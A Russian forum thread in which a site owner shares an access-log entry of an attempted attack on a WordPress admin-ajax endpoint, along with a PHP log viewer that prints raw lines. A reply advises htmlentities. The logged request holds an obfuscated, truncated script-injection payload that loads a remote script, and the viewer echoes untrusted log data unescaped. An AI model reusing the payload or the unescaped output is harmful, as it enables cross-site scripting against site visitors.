Перейти из форума на сайт.

НовостиФайловые архивы
ПоискАктивные темыТоп лист
ПравилаКто в on-line?
Вход Забыли пароль? Первый раз на этом сайте? Регистрация
Компьютерный форум Ru.Board » Интернет » Web-программирование » фильтрация вывода

Модерирует : Cheery

articlebot (22-05-2019 19:40): Простенький вопрос по PHP  Версия для печати • ПодписатьсяДобавить в закладки

   

sem88

Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Была попытка взлома сайта в логах остались записи
 
[15/May/2019:01:32:49 +0300] "GET /wp-admin/admin-ajax.php?action=update_zb_fbc_code&domain=</script><script HTTP/1.1" 403 3631 "wp-admin/admin-ajax.php?action=update_zb_fbc_code&domain=</script><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 118, 97, 114, 32, 115, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 10, 115, 46, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 10, 115, 46, 97, 115, 121, 110, 99, 61, 116, 114, 117, 101, 59, 10, 118, 97, 114, 32, 112, 108, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, .........  55 ));</script>
 
 
Для просмотров логов есть простой php скрипт
 
  $handle = @fopen("log.log", "r");
    if ($handle)
        {  
         while (!feof($handle))
            {
            $buffer = fgets($handle);
            if(strpos($buffer, $searchthis) !== FALSE)
            $matches[] = $buffer;
            }
        fclose($handle);
        }
   //вывод результата
  print_r($matches);
 
</pre>
 
 
Проблема в том, что при поиске в логах информации (например просмотр посетителей за 15/May/2019) , когда доходит вывод до этого зловреда  браузер "спотыкается" и пытается выполнить этот код  (редирект).  
 
Как этого избежать?  Есть  идеи?

Всего записей: 89 | Зарегистр. 13-04-2007 | Отправлено: 16:55 22-05-2019
Mavrikii

Platinum Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
sem88
Есть же общая тема по мелочам!
Читать
https://www.php.net/manual/en/function.htmlentities.php

Всего записей: 15040 | Зарегистр. 20-09-2014 | Отправлено: 17:31 22-05-2019
sem88

Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
спасибо

Всего записей: 89 | Зарегистр. 13-04-2007 | Отправлено: 18:44 22-05-2019
   

Компьютерный форум Ru.Board » Интернет » Web-программирование » фильтрация вывода
articlebot (22-05-2019 19:40): Простенький вопрос по PHP


Реклама на форуме Ru.Board.

Powered by Ikonboard "v2.1.7b" © 2000 Ikonboard.com
Modified by Ru.B0ard
© Ru.B0ard 2000-2024

BitCoin: 1NGG1chHtUvrtEqjeerQCKDMUi6S6CG4iC

Рейтинг.ru